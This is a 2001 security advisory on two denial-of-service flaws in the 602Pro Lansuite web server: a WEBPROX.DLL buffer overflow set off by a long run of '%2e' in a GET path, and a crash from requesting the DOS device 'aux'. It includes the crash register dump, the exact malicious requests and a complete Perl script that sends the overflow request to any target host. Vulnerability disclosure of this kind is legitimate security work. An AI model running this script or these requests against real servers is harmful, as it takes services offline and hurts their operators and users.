|
Advisory Name:Lansuite Webserver Denial of Service
Discovered:8th and 23rd Of March 2001
Application:602Pro Lansuite 2000a 1.0.34 - prior
versions and possibly 1.0.35
Platform:Windows 2k,95/98/NT - others unknown
Severity:Denial of service from application
Credit:Liamer@eircom.net
Vendor Status:Unknown -
http://www.602software.com/
Description:
There are 2 problems, the first is a buffer overflow in
WEBPROX.DLL and the other in relation to MS-DOS
device files.Credit should be given to GrÝndl
<peter.grundl@defcom.com> who made me think of
trying this same problem that he found in Alt-N
Technologies MDaemon WebConfiguration feature
which also affects Xitami Webserver 2.4b5 and
probably a whole load of other windows server
programs.
Demonstration:
Connect to the webserver and send the following
request:
GET /%2e%2e%2e%2e.... /HTTP/1.0
Where %2e is over 157 times
The server depending on how many times %2e or [.]
is sent will exit displaying the following error:
LANSUITE caused an invalid page fault in
module WEBPROX.DLL at 015f:008a1326.
Registers:
EAX=0000000a CS=015f EIP=008a1326
EFLGS=00010216
EBX=00000008 SS=0167 ESP=05202848
EBP=05202848
ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
Bytes at CS:EIP:
8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
Stack dump:
052029dc 00862e9a 0000000a 334f2b1f 000000fa
81623ff0 81648e38 00000008 bff7b317 018d0000
00000000 018d1650 018d1650 0520ace7 018d164c
052028cc
The other problem is requesting MS-DOS device
files, send the following request to the webserver on
port 80
GET /aux
---------------------------------------------------------------
#!/usr/bin/perl
#
# 602Pro Lansuite 2000a 1.0.34 Denial Of Service
#
#
# Malformed GET request
#
use Getopt::Std;
use Socket;
getopts('s:', \%args);
if(!defined($args{s})){&usage;}
my
($serv,$port,$foo,$number,$data,$buf,$in_addr,$padd
r,$proto);
$foo = "%2e";
$number = "160";
$data .= $foo x $number;
$serv = $args{s};
$port = 80;
$buf = "GET /$data /HTTP/1.0\r\n\r\n";
$in_addr = (gethostbyname($serv))[4] || die("Error: $!
\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!
\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(S, PF_INET, SOCK_STREAM, $proto) || die
("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";
print("Data has been successfully sent to $serv\n");
sub usage {die("\n\n$0 -s <server>\n\n");}
|
